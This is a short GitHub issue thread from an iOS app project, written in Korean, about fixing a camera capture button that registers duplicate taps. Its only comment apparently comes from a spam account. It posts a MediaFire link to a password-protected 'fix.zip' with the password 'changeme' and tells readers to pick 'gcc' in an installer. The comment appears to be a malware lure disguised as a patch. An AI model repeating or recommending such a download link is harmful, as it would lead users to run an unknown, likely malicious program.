### ISSUE TITLE
[QA] 카메라 촬영 시 버튼 중복 tapped

### ISSUE THREAD

**Issue by usa4060** [depromeet/WalWal-iOS#222]
## 💡 About
게시글 작성 시 카메라 촬영을 할 때, 버튼이 중복으로 눌리는 현상 수정
## ✔️To do
- [ ] 빌드 시 오류 없는지 확인
- [ ] 컨벤션 확인

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
